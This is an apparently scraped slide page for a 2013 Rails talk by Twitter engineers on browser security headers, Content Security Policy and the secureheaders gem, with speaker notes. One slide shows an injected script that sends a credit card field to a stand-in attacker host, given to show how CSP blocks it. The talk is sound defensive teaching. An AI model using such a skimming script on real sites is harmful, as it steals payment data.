2013: OC Rails Jan - SecureHeaders library and content security policy
•Descargar como PPT, PDF•
2 recomendaciones•1,600 vistas
Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application
Recomendados
Recomendados
Más contenido relacionado
Destacado
Destacado (6)
Similar a 2013: OC Rails Jan - SecureHeaders library and content security policy
Similar a 2013: OC Rails Jan - SecureHeaders library and content security policy (20)
Último
Último (20)
2013: OC Rails Jan - SecureHeaders library and content security policy
- 1. B Not your typical Rails security talk Header use @ Twitter @ocrails January 30, 2013 @ocrails | @ndm
- 2. What are headers? @ocrails | @ndm
- 3. Wait, not those ones @ocrails | @ndm
- 4. OK, but what are browser headers Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ== Accept: text/plain Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0 @ocrails | @ndm
- 5. Response headers Cache-Control: max-age=3600 ETag: "737060cd8c284d8af7ad3082f209582d" Location: http://www.w3.org/pub/WWW/People.html @ocrails | @ndm
- 6. I’m already bored Time to get awesomer @ocrails | @ndm
- 7. Security headers Leverage the browser for security @ocrails | @ndm
- 8. Sweeeeet. I don’t have write secure code! @ocrails | @ndm
- 9. Time of convergence @ocrails | @ndm
- 10. Should you? @ocrails | @ndm
- 11. Do you use these? Content security policy X-Frame-Options HTTP Strict Transport Security X-Xss-Protection X-Content-Type-Options @ocrails | @ndm
- 12. X-ContentType-Options Fixes mime sniffing attacks Only applies to IE, because only IE would do something like this X-Content-Type-Options = ‘nosniff’ zzzzZZZZZZzzzzz @ocrails | @ndm
- 13. X-Xss-Protection Use the browser’s built in XSS Auditor X-Xss-Protection: [0-1](; mode=block)? X-Xss-Protection: 1; mode=block (SCREENSHOT OF BLOCKED SCRIPT) zzzzZZZ... huh? zzzzzzzz @ocrails | @ndm
- 14. X-Frame-Options Protects you from most classes of Clickjacking X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN X-Frame-Options: ALLOW FROM example.com zzz... oh hey thats cool. Don’t frame my stuff. @ocrails | @ndm
- 15. X-Frame-Options @owaspoc Jan 2013 @ndm | @presidentbeef
- 16. Firesheep/SSL Strip Given I don’t haven’t received an HSTS header And I have a session When I visit http://example.com Then I am pwned @ocrails | @ndm
- 17. Other ssl fails Posting passwords over HTTP Loading mixed content Using protocol relative URLS @ocrails | @ndm
- 18. Strict Transport Security @ocrails | @ndm
- 19. How hard is it to use? Base Case Strict-transport-security: max-age=10000000 Do all of your subdomains support SSL? Strict-transport-security: max-age=10000000; includeSubdomains (SSL FOR DUMMIES PICTURE) @ocrails | @ndm
- 20. Content secur-a-wat? Content security policy is reshaping the security model It is a complicated spec with great differences across browsers It is not widely adopted However, It completely eliminates reflected and stored XSS It ensures that you never load mixed content It can protect users with infected browsers It allows you to accept arbitrary html code from users @ocrails | @ndm
- 21. Wat? Sounds cool. x-webkit-csp: script-src style-src img-src default-src frame-src connect-src font-src media-src object-src report-uri | @ndm @ocrails
- 22. QuickTime™ and a H.264 decompressor are needed to see this picture. @owaspoc Jan 2013 @ndm | @presidentbeef
- 23. Get rid of XSS, eh? A script-src directive that doesn’t contain ‘unsafe-inline’ almost eliminates most forms of cross site scripting. I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT @ocrails | @ndm
- 24. @owaspoc Jan 2013 @ndm | @presidentbeef
- 25. But I have to... OK, then I’ll inject: <script> var image = new Image(); image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val(); </script> FALSE! img-src violation, no XHR allowed @owaspoc Jan 2013 @ndm | @presidentbeef
- 26. Inline css too? WTF? @ocrails | @ndm
- 27. Choose your own adventure @ocrails | @ndm
- 28. Apply all the headers! @ocrails | @ndm
- 29. How to apply? Secure headers! Open sourced earlier this month https://github.com/twitter/secureheaders @ocrails | @ndm
- 30. How does it work? It sets a before_filter that applies each header Values are based on options passed to filter, or in an initializer Easily overridden Secure by default!!! @ocrails | @ndm
- 31. What about that security policy thingy There are > 6 differences between these two header values @ocrails | @ndm
- 32. Yay for standards @ocrails | @ndm
- 33. Long hair don’t care About browser inconsistencies @ocrails | @ndm
- 34. Other features Set separate policies for http/https Autofill chrome-extension: (becoming part of spec) Auto fill missing directives with default value (becoming part of the spec) @ocrails | @ndm
- 35. You mean there’s more on CSP? The browser sends reports! @ocrails | @ndm
- 36. What does the report look like? { "csp-report"=> { "document-uri"=>"http://localhost:3000/home", "referrer"=>"", "blocked-uri"=>"ws://localhost:35729/livereload", "violated-directive"=>"xhr-src ws://localhost.twitter.com:*" } } @ocrails | @ndm
- 37. Quiz: what does this report indicate? { "csp-report"=> { "document-uri"=>"http://example.com/welcome", "referrer"=>"", "blocked-uri"=>"self", "violated-directive"=>"inline script base restriction", "source-file"=>"http://example.com/welcome", "script-sample"=>"alert(1)", "line-number"=>81 } } @ocrails | @ndm
- 38. Header gem to the rescue It forwards CSP reports for Firefox It makes setting an enforce and report only mode easy for experimentation @ocrails | @ndm
- 39. Monitor and Tune ALL the things @ocrails | @ndm
- 40. Splunk @ocrails | @ndm
- 41. Trending and anomalies @ocrails | @ndm
- 42. CSP Phantom Gang ThreatDeck Brakeman Roshambo Email Email developers security @owaspoc Jan 2013 @ndm | @presidentbeef
- 43. Who wants to buy me a beer? @ocrails | @ndm
Notas del editor
- Hello AppSec USA. My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
- Talk about http basic authorization
- Many of these headers not encourage best practices while providing a better user experience and saving resources
- Take a survey
- save resources since nothing is framed
- Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
- hsts preload and max-age
- Explain how redirecting to https doesn’t protect the initial request Save round trip
- Explain mixed content: MITM assets Firesheep Cookies sent Supported in webkit (phantomjs) accept arbitrary and safe because inserted scripts won’t execute on* events javascript uris restrict using eval
- A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful xss attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and a by a variety of one-off methods.
- strings or hashes
- Yeah, some browsers protect you, but not all support it
- Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.